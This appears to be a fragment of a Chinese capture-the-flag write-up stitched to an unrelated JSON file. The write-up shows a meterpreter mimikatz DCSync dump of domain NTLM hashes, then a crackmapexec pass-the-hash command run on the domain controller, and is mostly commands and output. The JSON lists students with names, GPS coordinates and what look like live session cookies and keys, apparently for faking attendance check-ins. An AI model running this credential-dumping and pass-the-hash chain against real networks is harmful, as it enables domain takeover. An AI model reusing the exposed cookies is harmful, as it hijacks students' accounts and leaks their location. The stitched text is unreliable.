 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
meterpreter > kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502     krbtgt  fb812eea13a18b7fcdb8e6d67ddc205b        514
1106    Marcus  e07510a4284b3c97c8e7dee970918c5c        512
1107    Charles f6a9881cd5ae709abb4ac9ab87f24617        512
1000    DC01$   28462b35265440e802ac0d118ea9941d        532480
500     Administrator   10cf89a850fb1cdbe6bb432b859164c8        512
1104    XIAORANG-OA01$  b69c24b4e495904afbdee7546a1d9e42        4096
1108    XIAORANG-WIN7$  4df3570cf16f129c5a48cffc544a6676        4096

[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
meterpreter > proxychains crackmapexec smb 172.22.1.2 -u administrator -H 10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[-] Unknown command: proxychains. Run the help command for more details.
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17

最后一连,执行命令,type出flag
得到flag3

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(root㉿kali)-[/home/kali]
└─# proxychains crackmapexec smb 172.22.1.2 -u administrator -H 10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.1.2:445  ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.1.2:135  ...  OK
SMB         172.22.1.2      445    DC01             [*] Windows Server 2016 Datacenter 14393 x64 (name:DC01) (domain:xiaorang.lab) (signing:True) (SMBv1:True)
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.1.2:445  ...  OK
SMB         172.22.1.2      445    DC01             [+] xiaorang.lab\administrator:10cf89a850fb1cdbe6bb432b859164c8 (Pwn3d!)
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.1.2:135  ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.1.2:49666  ...  OK
SMB         172.22.1.2      445    DC01             [+] Executed command 
SMB         172.22.1.2      445    DC01             ___   ___
SMB         172.22.1.2      445    DC01             \\ / /       / /    // | |     //   ) ) //   ) )  // | |     /|    / / //   ) )
SMB         172.22.1.2      445    DC01             \  /       / /    //__| |    //   / / //___/ /  //__| |    //|   / / //
SMB         172.22.1.2      445    DC01             / /       / /    / ___  |   //   / / / ___ (   / ___  |   // |  / / //  ____
SMB         172.22.1.2      445    DC01             / /\\     / /    //    | |  //   / / //   | |  //    | |  //  | / / //    / /
SMB         172.22.1.2      445    DC01             / /  \\ __/ /___ //     | | ((___/ / //    | | //     | | //   |/ / ((____/ /
SMB         172.22.1.2      445    DC01             
SMB         172.22.1.2      445    DC01             
SMB         172.22.1.2      445    DC01             flag03: e8f88d0d43d6}
SMB         172.22.1.2      445    DC01             
SMB         172.22.1.2      445    DC01             Unbelievable! ! You found the last flag, which means you have full control over the entire domain network.
                                                                        
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
{
    "students": [
        {
            "name": "yst",
            "class": "107492",
            "lat": "26.03816",
            "lng": "119.18831",
            "acc": "30",
            "cookie": "s=70R7MBhip4eBuykjpHt3eRjkgElSu9NJqIhmRleW; remember_student_59ba36addc2b2f9401580f014c7f58ea4e30989d=4301236%7CUXztbF4hKjWgVEANujINP0TkvgTu1ubqBL6XAlfYMGTPCP2kp2ihQU1l2xE4%7C%242y%2410%24SlXd98MiAClJUxPQHkp3q.rxEdHM5YfcwYCtqm3dN2U2k4L0b4PUi; AMP_16e8798ff2=JTdCJTIyZGV2aWNlSWQlMjIlM0ElMjJmODZhOWFlYi04ZDdkLTQwOTQtOTFhNS1mYzMwM2FmMGZmMGMlMjIlMkMlMjJzZXNzaW9uSWQlMjIlM0ExNzY0MTY3NjA3MzUwJTJDJTIyb3B0T3V0JTIyJTNBZmFsc2UlMkMlMjJwYWdlQ291bnRlciUyMiUzQTAlN0Q=",
            "QmsgKEY": "16ab07db12df7ec4aa914a64745f82f8",
            "WXKey": ""
        },
        {
            "name": "cyh",
            "class": "107492",
            "lat": "26.03816",
            "lng": "119.18831",
            "acc": "30",
            "cookie": "s=X2ut5ymXP1kLj7OzuP2HU1kpO27z1sJPSY4pEwAs; remember_student_59ba36addc2b2f9401580f014c7f58ea4e30989d=3260040%7CRVrV5jpg3jIEsPN8ZDHZTB4qAiChL97ilmh7gMQKKgPr9qmIEkJ1PhNSKHZE%7C; AMP_16e8798ff2=JTdCJTIyZGV2aWNlSWQlMjIlM0ElMjJmODZhOWFlYi04ZDdkLTQwOTQtOTFhNS1mYzMwM2FmMGZmMGMlMjIlMkMlMjJzZXNzaW9uSWQlMjIlM0ExNzY0MTY3NjA3MzUwJTJDJTIyb3B0T3V0JTIyJTNBZmFsc2UlMkMlMjJwYWdlQ291bnRlciUyMiUzQTAlN0Q=",
            "QmsgKEY": "0194daf908324b0469be9eb80a9871d9",
            "WXKey": ""
        },
        {
            "name": "cch",
            "class": "107492",
            "lat": "26.03816",
            "lng": "119.18831",
            "acc": "30",
            "cookie": "s=8MSfaGU0woulOFthiwagpfEdbcgxIpqeaLKfa6Zr; remember_student_59ba36addc2b2f9401580f014c7f58ea4e30989d=3259549%7ChNsRpn2y2w8ERdJCqB160OvpOrOrecXVD6ZiyzdpUXIG2sKo5CTz2Rbgujy7%7C; AMP_16e8798ff2=JTdCJTIyZGV2aWNlSWQlMjIlM0ElMjJmODZhOWFlYi04ZDdkLTQwOTQtOTFhNS1mYzMwM2FmMGZmMGMlMjIlMkMlMjJzZXNzaW9uSWQlMjIlM0ExNzY0MTY3NjA3MzUwJTJDJTIyb3B0T3V0JTIyJTNBZmFsc2UlMkMlMjJwYWdlQ291bnRlciUyMiUzQTAlN0Q=",
            "QmsgKEY": "66a0b7f55705d79d2b8ed6be3c0a07ea",
            "WXKey": ""
        },
        {
            "name": "wsy",
            "class": "107492",
            "lat": "26.03816",
            "lng": "119.18831",
            "acc": "30",
            "cookie": "s=xlI8xVOw6soDDxQVHO9jurg4hB8ByVmKCAfvEvKp; remember_student_59ba36addc2b2f9401580f014c7f58ea4e30989d=3259554%7Comq3L2Wj0jlFGwQlMEtoZcr5zSPXz6BW6Qos2WssfiSJeFSQLPHm1H7N6POc%7C; AMP_16e8798ff2=JTdCJTIyZGV2aWNlSWQlMjIlM0ElMjJmODZhOWFlYi04ZDdkLTQwOTQtOTFhNS1mYzMwM2FmMGZmMGMlMjIlMkMlMjJzZXNzaW9uSWQlMjIlM0ExNzY0MTY3NjA3MzUwJTJDJTIyb3B0T3V0JTIyJTNBZmFsc2UlMkMlMjJwYWdlQ291bnRlciUyMiUzQTAlN0Q=",
            "QmsgKEY": "0194daf908324b0469be9eb80a9871d9",
            "WXKey": ""
        },
        {
            "name": "zgh",
            "class": "107492",
            "lat": "26.03816",
            "lng": "119.18831",
            "acc": "30",
            "cookie": "s=nTYlnQFzdrSoMCbk7A9Dg7zP39wOwpPRWSPasGx0; remember_student_59ba36addc2b2f9401580f014c7f58ea4e30989d=3260011%7C8MrFXxGtp5EjAriYsMxOH0mkwohEO8Nq4At7VbDyow2ioNYA0INIbKpZEmWP%7C; AMP_16e8798ff2=JTdCJTIyZGV2aWNlSWQlMjIlM0ElMjJiYjAzNDRhNy04ZTE4LTQ4OTItYWQ0Yi04YmJiYTA0Y2ViNjMlMjIlMkMlMjJzZXNzaW9uSWQlMjIlM0ExNzY0MTY4MDIyOTAxJTJDJTIyb3B0T3V0JTIyJTNBZmFsc2UlMkMlMjJwYWdlQ291bnRlciUyMiUzQTAlN0Q=",
            "QmsgKEY": "7ebaeefd84eba46a2ee77c3c071bd632",
            "WXKey": ""
        },
        {
            "name": "gh",
            "class": "107492",
            "lat": "26.03816",
            "lng": "119.18831",
            "acc": "30",
            "cookie": "s=CS9gbWuDjyLOMrLHavakKGMEAWdil2e3tDjyZ18t; remember_student_59ba36addc2b2f9401580f014c7f58ea4e30989d=3260416%7CuGoNBnjIyuXZXznQ9bOHKcjpiCzYQ8Vm2samlAu6tsPCqzKJntQutfv9CvkT%7C; AMP_16e8798ff2=JTdCJTIyZGV2aWNlSWQlMjIlM0ElMjJmODZhOWFlYi04ZDdkLTQwOTQtOTFhNS1mYzMwM2FmMGZmMGMlMjIlMkMlMjJzZXNzaW9uSWQlMjIlM0ExNzY0MTY3NjA3MzUwJTJDJTIyb3B0T3V0JTIyJTNBZmFsc2UlMkMlMjJwYWdlQ291bnRlciUyMiUzQTAlN0",
            "QmsgKEY": "16ab07db12df7ec4aa914a64745f82f8",
            "WXKey": ""
        },
        {
            "name": "chn",
            "class": "107492",
            "lat": "26.03816",
            "lng": "119.18831",
            "acc": "30",
            "cookie": "remember_student_59ba36addc2b2f9401580f014c7f58ea4e30989d=3259920%7CxA4a5zZ20jERuvtzaboJL6nwsJBrNOj3d7gQxz4frMg8fjO3W7z3gtldMfKT%7C; AMP_16e8798ff2=JTdCJTIyZGV2aWNlSWQlMjIlM0ElMjJmODZhOWFlYi04ZDdkLTQwOTQtOTFhNS1mYzMwM2FmMGZmMGMlMjIlMkMlMjJzZXNzaW9uSWQlMjIlM0ExNzY0MTY3NjA3MzUwJTJDJTIyb3B0T3V0JTIyJTNBZmFsc2UlMkMlMjJwYWdlQ291bnRlciUyMiUzQTAlN0Q=",
            "QmsgKEY": "7ebaeefd84eba46a2ee77c3c071bd632",
            "WXKey": ""
        },
        {
            "name": "wyj",
            "class": "107492",
            "lat": "26.03816",
            "lng": "119.18831",
            "acc": "30",
            "cookie": "s=g282mBFaqwTmHitHGoalnZv5k7PP0Y899PNTrAAP; remember_student_59ba36addc2b2f9401580f014c7f58ea4e30989d=3260000%7CtQZ8ff3DsGUhi2ofY8b7HYlPMb9WOSMAnUXn4yKMD92DE8ytAs2JhK5vVYsm%7C; AMP_16e8798ff2=JTdCJTIyZGV2aWNlSWQlMjIlM0ElMjJmODZhOWFlYi04ZDdkLTQwOTQtOTFhNS1mYzMwM2FmMGZmMGMlMjIlMkMlMjJzZXNzaW9uSWQlMjIlM0ExNzY0MTY3NjA3MzUwJTJDJTIyb3B0T3V0JTIyJTNBZmFsc2UlMkMlMjJwYWdlQ291bnRlciUyMiUzQTAlN0Q=",
            "QmsgKEY": "b120fbca2afad07be0644e03bc1a7438",
            "WXKey": ""
        },
        {
            "name": "zzt",
            "class": "107492",
            "lat": "26.03816",
            "lng": "119.18831",
            "acc": "30",
            "cookie": "remember_student_59ba36addc2b2f9401580f014c7f58ea4e30989d=3281025%7CrHbOJqwz5JPWqWHyhfxSLAecyCVIgBRpE4W5uCZgHzLnc7ZCPf3ElwDewFuM%7C; AMP_16e8798ff2=JTdCJTIyZGV2aWNlSWQlMjIlM0ElMjJmODZhOWFlYi04ZDdkLTQwOTQtOTFhNS1mYzMwM2FmMGZmMGMlMjIlMkMlMjJzZXNzaW9uSWQlMjIlM0ExNzY0MTY3NjA3MzUwJ",
            "QmsgKEY": "66a0b7f55705d79d2b8ed6be3c0a07ea",
            "WXKey": ""
        },
	{
            "name": "zjy",
            "class": "107492",
            "lat": "26.03816",
            "lng": "119.18831",
            "acc": "30",
            "cookie": "remember_student_59ba36addc2b2f9401580f014c7f58ea4e30989d=3259693%7Cg4ELjVgSBIL6wzm6S67Asv1uRKYODcj5Rt6sMQ6x6X75uAqawk3p20lQgho5%7C; AMP_16e8798ff2=JTdCJTIyZGV2aWNlSWQlMjIlM0ElMjJmODZhOWFlYi04ZDdkLTQwOTQtOTFhNS1mYzMwM2FmMGZmMGMlMjIlMkMlMjJzZXNzaW9uSWQlMjIlM0ExNzY0MTY3NjA3MzUwJ",
            "QmsgKEY": "66a0b7f55705d79d2b8ed6be3c0a07ea",
            "WXKey": ""
        },
	{
            "name": "cyz",
            "class": "107492",
            "lat": "26.03816",
            "lng": "119.18831",
            "acc": "30",
            "cookie": "remember_student_59ba36addc2b2f9401580f014c7f58ea4e30989d=3259485%7CfugAy5xoW77rV4YeKL3Wtepb231wWfMGMUm5Gg5YOeovMvO4kEPBuxzw8XvF%7C; AMP_16e8798ff2=JTdCJTIyZGV2aWNlSWQlMjIlM0ElMjJmODZhOWFlYi04ZDdkLTQwOTQtOTFhNS1mYzMwM2FmMGZmMGMlMjIlMkMlMjJzZXNzaW9uSWQlMjIlM0ExNzY0MTY3NjA3MzUwJ",
            "QmsgKEY": "66a0b7f55705d79d2b8ed6be3c0a07ea",
            "WXKey": ""
        }


    ]
}